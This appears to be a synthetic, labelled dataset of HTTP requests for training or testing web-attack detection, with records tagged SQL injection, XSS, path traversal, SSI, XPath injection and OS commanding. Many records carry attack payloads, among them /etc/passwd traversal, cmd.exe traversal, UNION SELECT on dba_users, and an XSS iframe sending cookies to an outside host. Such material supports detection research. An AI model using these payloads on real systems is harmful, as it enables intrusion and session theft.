Expires: Thu, 04 Jun 09 19:29:52 GMT
Last-Modified: Tue, 29 Mar 05 18:36:20 UTC
Host: www.lapdlinc.st
Connection: imedfJ
Accept: */*
Accept-Charset: big5, x-mac-cyrillic;q=0.3, windows-1253, iso-8859-8
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 44.184.166.131
Cookie: daIlatps4Ddi=lwindow.open0hbh1 ;ea2ehe=36942;rtruie=6565973;niOrAl=y9DiUh9;pssdi2aaojtRtUJ=z.9Ish2;nTEvbscriptw=| cat   ../../../../../../../etc/passwd   |
Cookie2: $Version="947"
Date: Sat, 17 Apr 04 01:04:21 CET
ETag: W/"NnPbsExR3bAhhO3Kp"
Expect: cuo7as=cThyeio;qr1iG=tbiao
From: oafn9@wessni.org
If-Modified-Since: Mon, 25 Apr 05 09:19:40 CET
If-Unmodified-Since: Wed, 18 Feb 09 18:48:16 CET
If-Match: "GcVBML3FtafhNIAd"
If-None-Match: *
If-Range: Mon, 29 Nov 04 01:47:15 UTC
Max-Forwards: 277
MIME-Version: 1.4
Pragma: nRp=cwpeo
Proxy-Authorization: Digest algorithm=MD5
Authorization: a9zfg bjaoibs=t3ut
Referer: http://ia5fc.com/l8ityh/6Fnezi.htm
TE: trailers
User-Agent: Mozilla/2.5 (compatible; MSIE 0.2; Windows NT; enaerbcmne; ce51pj; oaui)
UA-Disp: 3215,0463,8
UA-OS: Windows 95
UA-Pixels: 343x089
Via: HTTP/9.2 www.iarebcen.tiff
Transfer-Encoding: deflate
Upgrade: nesxz/8.9, lSoa/7.5, iuimeN/3.9, etvuke/7.3, atuf/6.6
Warning: 174 www.uInfgn.jpg "oqsaec3wffbla8nattl5" 
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

rsayoLedsclt=tta&eetuRshe=1&sammHsock_streamxmlC=34&dnariiiown=r&kMCk5rR=edteo&1.Q2g4-ayLLc=ang2n&bvXrsae80Eets=t30hXY1D1jJ&th4nNVJVVtmp=cxtermAo&ABHVqu=qi9tm&sDioriFd2sirqYt=rc2?&spassthruOq=92663856&nDatDtac=Eisn&setra=3686493&hnweah=80120&HkmxjKkqUrBt=nlsfd1bwroluh7lSgl

End - Id: 43649
Start - Id: 43893
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 16.202.41.26
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 132.194.132.1
Cookie: Aee0tan=2C3VJUh6zzD;DnioypOst=-tbreabu;tuanrlr=lsobvmeriojde;W.-BU-LVLa6q=ioydsu9gdniPyscriptMiw ;iegcbsnac=t8e5adqieeprPE;gionss=irlueetEra6
Cookie2: $Version="05"
Date: Fri, 02 Mar 07 03:51:10 CET
ETag: "Ep17MfiXz7naL9aGqdZ"
Expect: 100-continue
From: 9HsNes@1a7h.biz
If-Modified-Since: Mon, 22 Nov 04 13:02:31 UTC
If-Unmodified-Since: Wed, 05 Dec 07 08:09:59 UTC
If-Match: "8Srd7BqaI14qLa_DNIbX"
If-None-Match: "xmMfbKlWK96TC2ZB"
If-Range: Wed, 13 Oct 04 08:34:10 GMT
Max-Forwards: 059
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM dGxFdHRpbnNuZXRwZmlwU2NjcGVucmk5bWFkbXFhbGhlb2FmZQ==
Authorization: Basic b3NieWVHOnNhdmU=
Range: 3121-127,822-
Referer: /oadm/hnfqt/iioejvh/urtao.html
TE: chunked;q=0.2,chunked;q=0.2,gzip
Trailer: If-Match
User-Agent: nbhtotuTrl7
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 349x5070
Via: HTTP/0.7 221.188.184.70
Transfer-Encoding: np1euh; iwnbdsd7=rBi7ta
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 115.236.50.254
X-Serial-Number: 245906346530085
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43893
Start - Id: 41324
class: SqlInjection
GET /jnelib6Wa.i4/exbl/erEteu6o.tiff?EFXldA4JbNX=twleevalgochild&OstRati=m6yufccmi&chlob0NOwitipo=EsraeiOgad HTTP/1.1
Host: 191.80.60.210
Connection: keep-alive
Accept: text/html
Accept-Charset: *
Accept-Encoding: *
Accept-Language: zxmw-itiadh, nedsnn-doeid
Cache-Control: up=0
Client-ip: 128.120.29.207
Cookie: 6orsisSgFx6s=chairs'    UN/**/ION   SEL/**/ECT yea   FROM     dba_users WHERE year  like  '%25;3d6cw=8662271
Cookie2: $Version="1"
Date: Wed, 08 Feb 06 17:23:18 UTC
ETag: W/"rJXk8fCmAGWrNiGNJy"
Expect: 100-continue
If-Modified-Since: Tue, 13 Jan 04 20:29:12 GMT
If-Unmodified-Since: Sat, 05 Mar 05 09:03:12 CET
If-Match: "hv7j1f@I896F-I6.P0"
If-None-Match: *
If-Range: "5VO@FyvTtY0.PFp2siuY"
Max-Forwards: 4
MIME-Version: 4.1
Pragma: a5=ciee
Proxy-Authorization: Basic ckRwZWRzMjpyaHVhMlM=
Authorization: eiOlse meSia=ebceths
Range: 4-
Referer: http://www.hehdi7.net/deoce/fesk/hafn6i0a/mertuc/t0upjto9.pdf
TE: gzip;q=0.3,chunked
Trailer: User-Agent
User-Agent: cv9yFK. http://www.eeu80lo.uk
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 654x944
Via: 9.0 www.gedof5ei.jpg, FTP/9.0 www.ejpAm.shtml, HTTP/8.8 www.eazRtjw.shtml
Transfer-Encoding: cuzd
Upgrade: z7mnyi/7.1, meohI/0.8, eOtfa/4.5, rnyaca/2.1, mina/5.4
Warning: 731 www.cyyerh.gif:8 "drlplsjnceh" "Fri, 01 Dec 06 07:00:44 CET"
X-Forwarded-For: 94.64.57.114
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41324
Start - Id: 36372
class: PathTransversal
POST /Ecrk6/nei.jpg? HTTP/1.0
Content-Length: 88
Content-Language: tnseitet,yeasfcd,geqisiek
Content-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 31 Jan 06 23:49:26 GMT
Host: 249.1.120.178:80
Connection: Iurel
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.5, gzip;q=0.3
Accept-Language: *
Cache-Control: max-age=5
Cookie2: $Version="3"
Date: Thu, 05 May 05 24:33:21 GMT
If-Unmodified-Since: Wed, 07 Mar 07 03:44:23 GMT
If-Match: *
If-Range: Fri, 11 Jun 04 02:24:21 UTC
Max-Forwards: 350
Referer: /eilEuWic/ulkeiod/las96.mdb
User-Agent: \.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Via: 5.0 www.iwUt.tiff:0895
X-Serial-Number: 40169303930821255

eMtugir=1999&ec7nin7seIee6ai=52371&lt7ymsghhildtui=7&hteiea=9625&euhHhcre=h>shutdown8c

End - Id: 36372
Start - Id: 39213
class: SSI
POST /iRMP8WqfbG2nj@L12/n5iTi/IWnsnph-S.deletebcHw/Suoe.aspx? HTTP/1.1
Content-Length: 191
Content-Language: tu
Content-Encoding: compress
Content-Location: http://www.lOttve.gov/r5yittn/q7oOlu/861erd/60ene.png
Content-MD5: bnVuOHRuY2NOMTVlaXNodA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Jan 09 19:45:22 GMT
Last-Modified: Sun, 22 Oct 06 13:20:24 UTC
Host: www.aro7ob.be
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: wfryoogc-aXwe;q=0.3, do0ueHf-Fcreoear, drAiu-Teeg;q=0.1, gvxWzo-n
Cache-Control: max-age=3007
Client-ip: 64.71.108.76
Cookie2: $Version="66"
Date: Mon, 26 Mar 07 01:14:22 CET
ETag: W/"yWtCdWDxCwfSmeHFrxx5"
If-Modified-Since: Tue, 12 Jan 10 11:20:54 GMT
If-Match: *
If-None-Match: *
If-Range: "65qrkqp7hJYGhgdo"
Max-Forwards: 1
Proxy-Authorization: rTnlii stmi=namTcnnr
Authorization: 0kpx r2yerr=edehOn
Referer: /iEsytd/eosfna.tar
User-Agent: otnovokciltgc3o
UA-CPU: Sparc
UA-Pixels: 8546x0268
Via: 4.5 227.18.148.227, HTTP/2.7 www.8t54An.png
Transfer-Encoding: deflate
Upgrade: 8aace/0.5, e8sp/1.4, ix7ohs/1.2
----: ------------

tee=68001215&wsbps=apxvgWn&scriptRT1mMCR=yoa52xtu&eTTSaccess_log=<!-- #exec     cgi="/cgi-bin/script?pResceeyr"    -->&lu2u=r9B04JYaXf&tbeg=nOstp&6daste=0audbyfgsydfo6gtta

End - Id: 39213
Start - Id: 45443
class: PathTransversal
GET /ap9mcriaLofdEM/f17cCVh5GPINTxSgIRk/o1KsbASOkLH09-zp2H/v1UC2Glogtdd/edY6krs7e/Rwindow.openbWOVCB.jsp?iJC76uiframe=27419&rphh4r=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fisrasi%2Fitriic%2Flaseinma%2Fsiic.exe&srmOo4e=795823&nle6seidesaa=tf1iesOawhg5OtM HTTP/1.1
Host: 225.29.185.44
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Cookie2: $Version="76"
Date: Sun, 25 Jul 04 23:19:49 GMT
If-Modified-Since: Sun, 16 May 04 05:32:34 GMT
If-None-Match: "8_ctXRlnCKINx16eiKrq"
If-Range: Mon, 08 Aug 05 16:56:37 UTC
Max-Forwards: 4
Pragma: ieasmth='4'
Authorization: Basic Ym90aHVoOjJ0Y2FlZXM=
Referer: /DfnMeoo/eyygAef/ayUzt/tltnnoo/yenei3et.html
User-Agent: Mozilla/7.6 (Machintosh; U; Mac OS X 3.7; eh-en; rv:7.1.3) Gecko/68377112
Via: 3.0 139.84.226.124:290, HTTP/8.6 71.222.54.52
Upgrade: ldu4yj/2.7, bmeN/8.1, deh/2.9

null

End - Id: 45443
Start - Id: 48890
class: XPathInjection
GET /dWQvTpF1BcwlwhP5w/isYjC/n-eMd/neet.cfm?ZnWadminvY5=994458&o3aeititCheu9m=cFEIraruluSvelaelH&RAgid@1_k9=2622&Ji8piEaTwem=ojvmyF4&hpaohezneueoi=yte%24%25tlcrymWn&dr2ee=nVXKbBV%40SvI4&PoalmtncqZcb=otwndn&@hlocationBpdNyRcI=er21o&ralatogao=ir%2Fba%2Fmi%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D782%5D+++or+++++%27Afxfnku%27%3D+++%27&vtbihtdr6=tdnOssnGl5nple&1m8PAHQx=l&onst75ku=9BgK.BihI.n9&4@LoKXcG5p4=236&documentnqkPf_=euspn%3Dohnselecte1u&utocn=ox7AcyrB HTTP/1.1
Host: 141.248.208.194
Connection: keep-alive
Accept: audio/x-wav;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=19414
Client-ip: 230.107.51.66
Cookie: AyfajmodcteE=y9FOyhYeUba1;sjrrk=2;rtre8oiiwrjkn=ha6hprocessing-instructionas2po
Cookie2: $Version="74"
Date: Sun, 08 Jun 08 19:08:28 UTC
ETag: "yoHUBRdDJNDe7kMqNoJu"
Expect: 100-continue
From: Cwemtetz@wf3dzee.it
If-Modified-Since: Sat, 05 Apr 08 19:54:32 CET
If-Unmodified-Since: Wed, 06 Dec 06 20:49:09 CET
If-Match: *
If-None-Match: "b5U_PH56mbZCgza1K3bn"
If-Range: *
Max-Forwards: 35
MIME-Version: 4.6
Pragma: 3istR=ee8
Proxy-Authorization: Digest opaque="ueen"
Authorization: eIkop stra6u=2eeltt
Range: 87-22
Referer: /eletp9eo/e0goxd/eEt9/Nevhsl.js
TE: deflate,chunked;q=0.6,deflate;q=0.3
Trailer: User-Agent
User-Agent: h9VMzfxbB8 http://www.nbdt.net
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1420x8323
Via: 7.7 www.di78rIn.jpeg, 0.3 2.222.163.211
Transfer-Encoding: gzip
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 766 www.wbdsi.gif "iiitgc4re" "Thu, 08 May 08 03:06:26 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 4777989282549
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48890
Start - Id: 49483
class: XPathInjection
GET /eyv0PZAwq6FY/bxb/execLapW5div._/t2/sgoo.php3?epvhMget6dt=ronqrhtk&IeP1e7oscneoysf=cnh&pasa=34642205&AaHxm6ehrwi=Ldth&vnnsdoha81dhcA=6194+++++or++++1%3C++++1mesy%2Fti1sf%2Fa%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D2%5D+++++or+++++8861%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: www.5cya.net
Connection: close
Accept: application/*, image/gif;q=0.0, text/xml;q=0.1
Accept-Charset: iso-8859-9, iso-8859-5;q=0.3, big5, windows-1253, iso-8859-8-i;q=0.6
Accept-Encoding: identity;q=0.9, identity
Accept-Language: 3hhjies-sl, oipnt-snag, errEt-cwiz3s, Wielg3-tgt7l
Cache-Control: min-fresh=2
Client-ip: 246.26.86.133
Cookie: 0s6r=0600;en8tNkmE=513868;NurieoutnIcl=yeMCNr3t4a;5u10hatena=tc;oao0OSw=14910;2d8aaneoado=919787
Cookie2: $Version="3"
Date: Thu, 17 Nov 05 15:05:16 GMT
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: H4ft@ataqsdls.net
If-Modified-Since: Sun, 05 Dec 04 01:05:08 GMT
If-Unmodified-Since: Thu, 25 Mar 04 09:08:43 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Jul 08 09:29:41 GMT
Max-Forwards: 6508
MIME-Version: 2.1
Pragma: r=ottEgr
Proxy-Authorization: Digest cnonce="isagrr"
Authorization: Digest realm
Range: -012
Referer: /euAexb/Owstrhe/Osaoe/hTw2ETlw.pl
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/6.1 (Machintosh; U; PPC 5.4; 2l-5q; rv:0.4.6) Gecko/00744471
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: bia54t/7.1 www.feJLtpr6.jpeg
Transfer-Encoding: compress
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 607 37.136.158.28 "s5ntidssyngee" "Wed, 07 Sep 05 11:09:31 UTC"
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49483
Start - Id: 39654
class: SSI
GET /s5epwcedscqogprte/bvNusrexeci.8I8Wnn_/iajYtLKOqAvsRuq2rp-/ss.php?n0oet=%3C%21--++++%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22--%3E&bdj7rc=seu%3Dchild%5C%7E%27E&iutm=+i6s+Azcdtewai HTTP/1.1
Host: 193.176.179.53
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255;q=0.1, x-mac-greek;q=0.2, utf-8;q=0.9
Accept-Encoding: 
Accept-Language: t-moo9cidn;q=0.5, uas-nh9, enTc-ahwEc1nt, e-8Tnmaulf
Cache-Control: only-if-cached
Client-ip: 193.240.238.168
Cookie: dzO_W=hwvDiWxy
Cookie2: $Version="2"
Date: Sat, 01 Mar 08 23:55:22 CET
ETag: "bgzQc-vq1mgSf1lPiZg"
Expect: 100-continue
From: lenzhrem@dasbEmim.st
If-Modified-Since: Fri, 22 May 09 19:45:33 CET
If-Unmodified-Since: Fri, 16 Apr 04 16:00:02 CET
If-Match: *
If-None-Match: *
If-Range: "H6HZBOgvt6JutE6"
Max-Forwards: 86
MIME-Version: 6.4
Pragma: 2itty='bbh2cj'
Proxy-Authorization: NTLM Mm41YzRyZ2VsbDdzbWxhdHRyeXRzbm1jaHNtc245aXQ=
Authorization: Digest response="7990c8aD25A18B6bFB7a1D1BBAdb1e1f"
Range: 54-,0-33,3-74
Referer: http://www.msNEa.de/ai4to/aaeni/igiasbT.nsf
TE: trailers,trailers,deflate;q=0.5
Trailer: Authorization
User-Agent: Mozilla/7.4 (X11; U; Linux i386 0.2; ma-ht; rv:3.3.6) Gecko/38687259
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 824x2437
Via: rsc/4.8 www.Oasndl.css, 3.4 170.84.59.159
Transfer-Encoding: deflate
Upgrade: o7s/5.6, dipl/2.7
Warning: 182 174.22.41.47 "UhdAhltnsetaa1re" 
X-Forwarded-For: 50.214.174.78
X-Serial-Number: 659531112
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39654
Start - Id: 46611
class: XSS
GET /bSBR/sPm7tMgtdflRywmS/ec6satmeathnAs3Ldn/ihin/ii88jtxW5nLRrnEzBb.cgi?zGOboot.iniorl=tr3k6&6etc=mrpmaapsktxwp-Ur&eshreeeie0ndhcb=t%3F+y+rttvwdocumenthN8ttncautoexect&nwbei5tehLnuj=9157072&rxxkRpasswd=l06+e&t8r=000&rXQXTV0Bsb=onrnmtyeenesg1etm&nSreespcanqR=rcues&nInhnhh=86&ip8rtd=394525&e7sfsasm=sol9j%27n++ HTTP/1.0
Host: www.osgnao.com
Connection: keep-alive
Accept: text/xml, audio/x-wav
Accept-Charset: windows-1252;q=0.5, koi8-r, x-mac-roman, x-mac-korean;q=0.2, x-mac-arabic;q=0.1
Accept-Encoding: 
Accept-Language: <div     style =    " behaviour: url([http://www.ilde.com/script/esai.php]);" >
Cache-Control: no-transform
Client-ip: 42.2.77.82
Cookie: xy5Pypq=cnidmAn;formD2aK3wnph-stdin=lilreplacedtftovit;R1Qallg=otiupMsexannipte;sntr=icpeiflcAoidkgLao;eness=5594
Cookie2: $Version="502"
Date: Mon, 04 Aug 08 02:35:27 CET
ETag: W/"2T5gTFeWKt95d62"
Expect: 100-continue
From: fa4oar@deOvi.uk
If-Modified-Since: Wed, 13 Oct 04 13:18:59 CET
If-Unmodified-Since: Fri, 18 Feb 05 05:49:33 GMT
If-Match: "azZgVZ@U8xVGB46nAqRs"
If-None-Match: "bwy-yLhpczm2Jn2Gym"
If-Range: Wed, 02 Jul 08 12:42:25 GMT
Max-Forwards: 962
MIME-Version: 1.9
Pragma: l='ritua5aO'
Proxy-Authorization: Digest username="6LlGdn"
Authorization: Digest opaque="hweetf"
Range: 29-,197659-,4-7273
Referer: http://www.o7nph.fr/onvIMs.doc
TE: trailers,deflate,deflate;q=0.9
Trailer: Host
User-Agent: Mozilla/2.4 (Machintosh; U; PPC Mac OS X 6.9; pe-0C; rv:5.2.4) Gecko/85010256
UA-CPU: PowerPC
UA-Disp: 7714,181,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 950x529
Via: 9.6 6.62.12.50, HTTP/0.7 www.ldtemnnn.css
Transfer-Encoding: compress
Upgrade: 1ssnt/2.7, Necil/0.4
Warning: 045 www.g6oeJmh.shtml "HEkdlTofnTpdehenjd" 
X-Forwarded-For: 245.134.55.175
X-Serial-Number: 36731
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46611
Start - Id: 44811
class: PathTransversal
GET /OnyeTtttFlealar/eAu/etabsss4iIh/FttTx8documentESchild7/etbt5s0hmewtiaa/haa7VB/gosheaar/apfXcOY38se/FEh112rfhttpHK/yK2M8IeG6athXTcdb/a0u/oMrR7NHFqsdY0cFwP.jpg?hslfoc4tnwmewam=4TRz&teKcopyTdC=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F&pt=6psc&ii9tsre=edhetidocumentwo&en8aeoh=5&ie8ib=slhyeob&9nhagirt=R0i&Q7uI=bt&inputh10=et HTTP/1.0
Host: www.ptafEeNarR.uk
Connection: close
Accept: image/*, video/mpeg;q=0.2, audio/basic
Accept-Charset: *
Accept-Encoding: compress;q=0.6, deflate;q=0.2, deflate, identity, identity;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 162.199.90.42
Cookie: OWFTlsHJ=94377;1fkVVeNCs=u_5VbkSS;t9et3in3eNtmua=<oceqarmusa;nnheimqtsnf=2995212
Cookie2: $Version="8"
Date: Fri, 09 May 08 01:51:44 CET
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: yhupow8
From: srwYoiR5@1klnww.fr
If-Modified-Since: Sun, 09 Mar 08 04:49:59 CET
If-Unmodified-Since: Wed, 01 Dec 04 24:10:00 GMT
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: *
If-Range: Fri, 01 Oct 04 20:37:42 CET
Max-Forwards: 614
MIME-Version: 9.8
Pragma: 3krf='eTo'
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: lheeo YhTw=9aydt
Range: -970
Referer: /clrmntnn.php4
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/4.4 (compatible; Konqueror/3.1; Win 9x; xnitss)
UA-CPU: PowerPC
UA-Disp: 035,8983,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5717x165
Via: 0.9 www.6hohEnr.tiff, 7.1 134.138.220.239
Transfer-Encoding: deflate
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 444 49.226.175.61:095 "anooncjio" "Wed, 26 Jul 06 23:48:52 GMT"
X-Forwarded-For: 20.26.247.44
X-Serial-Number: 40759970154914
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44811
Start - Id: 35602
class: XPathInjection
GET /ap786AselectsN/n_/ttieAlamwhfniizcjc/4he6lOgqNjgIc/rtvxYsqGJIJFlzgZ/CQSY1vT43XWR02/mQ8HpRM1c.htm?5RincludeVcr5zD6=ee4M7mvLu&SSx6XFR5N1=ra%5DN0eh&ihrmsZplc=0557186387&msIqyectayzoo=snboxiae%27+++or++6++%3C+++count%28path%2Fchild%3A%3A*%29+or++++%27itdt%27+%3D++++%27&3eatesA=4695 HTTP/1.1
Host: www.e5dmiqps0.com
Connection: close
Accept: image/gif;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 132.226.188.115
Cookie: jin5TCJIN5pp=zph;zUar6vco=4nE;d7bscadajeesp=llthIoe;F144X=y5stdinca~ecd;n@bKTW=n4x
Cookie2: $Version="89"
Date: Mon, 05 Mar 07 24:51:21 GMT
ETag: W/"tF5Sw0AaliY@Erh7FZ"
Expect: qiiw
From: hsgss@kOcgeesht.ch
If-Modified-Since: Sun, 28 Oct 07 03:42:36 UTC
If-Unmodified-Since: Wed, 30 Aug 06 12:30:35 GMT
If-Match: "KZsHIbB1xmPO2og889_"
If-None-Match: *
If-Range: "EqszOohtJcbcnkQhD"
Max-Forwards: 2187
MIME-Version: 4.7
Pragma: o=nq1rfn
Proxy-Authorization: eNmRc aseer=gr3Gfc90
Authorization: Basic c3BoZGVpbDpubGlvaHNp
Range: 1278-6
Referer: http://de9g.org/Ero5msi/PecdFesE/iOyico/poeve/mfn4ceo.pl
TE: trailers
Trailer: Warning
User-Agent: geeor7 (xM_RHFo-Z)
UA-CPU: x86
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 138x439
Via: 4.4 www.erlu.jpeg, 0.3 99.180.156.149
Transfer-Encoding: compress
Upgrade: eto3T/9.1, 9rfo3l/2.2, nuUaek/3.0
Warning: 189 www.shodin.tiff:54 "hwauAetaeeeSes4" "Tue, 24 Mar 09 21:44:06 CET"
X-Forwarded-For: 93.7.188.203
X-Serial-Number: 65275952070459353
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35602
Start - Id: 42154
class: SqlInjection
GET /eyoatnntt/TUa/lhreufbrdip.js?SQS-z3rzqaccess_logPC=%28l%2Fm+srwhereQtw&dt=38&0VKwp-8divOX0=%3Axipi&Eg3QueI@g_kor=7twue&y7rhheaq=rGUR&ss4=%27++OR+%2799he%27++%3C++++%27X&imte=erObbtvugu-M&s7nhe4i=srwnca%3Fo%26hsrEsm&nEgsos5baqu2iIh=4653205&Ptz0osennTfa=aBiUJG3&vsthj7=da%3Cszslib%5Dh HTTP/1.1
Host: www.boiuljeg.st
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 117.221.83.105
Cookie: e4ggEwilxysiS=88426174;7ye7h3aEmNnex=4464244;roope9tneni=50715829;VsPqBQrC1Dz=o5dv?;MuueeanpdR=4cTP5V
Cookie2: $Version="6"
Date: Wed, 17 Dec 08 08:15:58 CET
ETag: W/"q9@-@42oTbHORdulE04"
Expect: 2tic
From: tktabU@4ahlq0ig.org
If-Modified-Since: Sun, 29 Jun 08 05:21:08 UTC
If-Unmodified-Since: Mon, 28 Aug 06 18:14:01 UTC
If-Match: "WC_sA9U12wVxJI9ag"
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest realm
Range: 4781-
Referer: http://atsd1oao.be/tQcSeoai/rHlhnt.swf
TE: deflate,trailers
Trailer: Expect
User-Agent: Mozilla/1.1 (Windows; U; Windows NT 5.8; ou-9t; rv:3.7.1) Gecko/77772414
UA-CPU: StrongARM
UA-Disp: 2259,521,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3499x504
Via: 4.5 www.homphXe.html, HTTP/5.2 www.oanEato.htm:7
Transfer-Encoding: ktfi
Upgrade: cosqd/4.3
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42154
Start - Id: 47991
class: XSS
GET /iH_Ge/f6Jivt7RfN4_0HhHS/tEKeb4M@.css?t0zi0na=35232&laTtueSq6=6tlDwcoatldl&varW01Fhavingnf-=nor&isntiampksra=%3Ciframe+++++src+++%3D+++%22++++vbscript%3A%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.asrotora.com%2Fcgi-bin%2Fratagetrro.cgi%27%2Bdocument.cookie%29%3B%5D%22++++%3E HTTP/1.1
Host: 197.221.65.48
Connection: keep-alive
Accept: audio/basic, application/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-age=2
Client-ip: 200.176.81.45
Cookie: yaZ2=connectn
Cookie2: $Version="01"
Date: Sun, 28 Aug 05 17:31:47 UTC
ETag: W/"9VxvwsiJ2eaRQNV5OqF"
Expect: tuecaeh
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Tue, 26 Jan 10 13:17:37 CET
If-Unmodified-Since: Wed, 07 Mar 07 04:14:47 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Jun 09 04:52:23 GMT
Max-Forwards: 9
MIME-Version: 1.7
Pragma: Raco='foinef'
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Digest realm
Range: 2-,-873,110-95038
Referer: http://www.cnnoelin.fr/nmit/ssev5iI.shtml
TE: gzip;q=0.7,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/2.9 (Windows; U; Win98 5.9; en-al; rv:4.2.6) Gecko/92236634
UA-CPU: 68000
UA-Disp: 719,994,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 480x167
Via: 0.0 www.eoiaxnzR.shtml, 6.2 www.otTwn3.tiff
Transfer-Encoding: gzip
Upgrade: ujou/5.1, doRY4j/6.5, hEhh/2.5, uoids3/2.1, iawl/7.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 41529
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47991
Start - Id: 44825
class: PathTransversal
GET /0@jMTWyaWwkOsLjlinw/n9SLQrfYheWOZk0.X@/WR/sFl199@fkdy3g/b541CzfYservicese68/ski5d7lI/k4raa/DB7/avArteuIiwmesTh.asmx?ahaordwucBl36h=s%40abBn&U4XH=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F HTTP/1.1
Host: www.eqpQxee.de
Connection: close
Accept: audio/*;q=0.7
Accept-Charset: windows-1257, windows-1254, iso-8859-7, windows-874, cp-932
Accept-Encoding: 
Accept-Language: ntDlu-atu, ef-dazshn7, oUoxinrr-te768nh3;q=0.4, e1sc0R2-et1, R-t60dta;q=0.5
Cache-Control: only-if-cached
Client-ip: 92.163.213.217
Cookie: wDa=a;dnzaAttreoastc=i6fTK9vcR
Cookie2: $Version="23"
Date: Sun, 03 Jul 05 12:24:27 CET
